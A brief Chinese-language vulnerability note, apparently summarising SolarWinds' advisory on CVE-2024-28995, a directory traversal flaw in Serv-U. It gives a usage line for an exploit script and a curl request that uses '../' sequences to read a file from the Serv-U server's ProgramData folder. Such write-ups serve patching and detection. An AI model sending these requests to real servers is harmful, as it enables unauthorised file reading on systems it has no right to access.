2024年6月5日,SolarWinds 发布了关于 CVE-2024-28995 的安全公告,这是一个影响其文件传输解决方案 Serv-U 的高危目录遍历漏洞。该漏洞由 Web Immunify 的研究人员 Hussein Daher 发现。
python3 CVE-2024-28995.py -t http://example.com/ -f somefile
curl -i -k --path-as-is "http://<target>/?InternalDir=/../../../../ProgramData/RhinoSoft/Serv-U/&InternalFile=Serv-U-StartupLog.txt"
参考: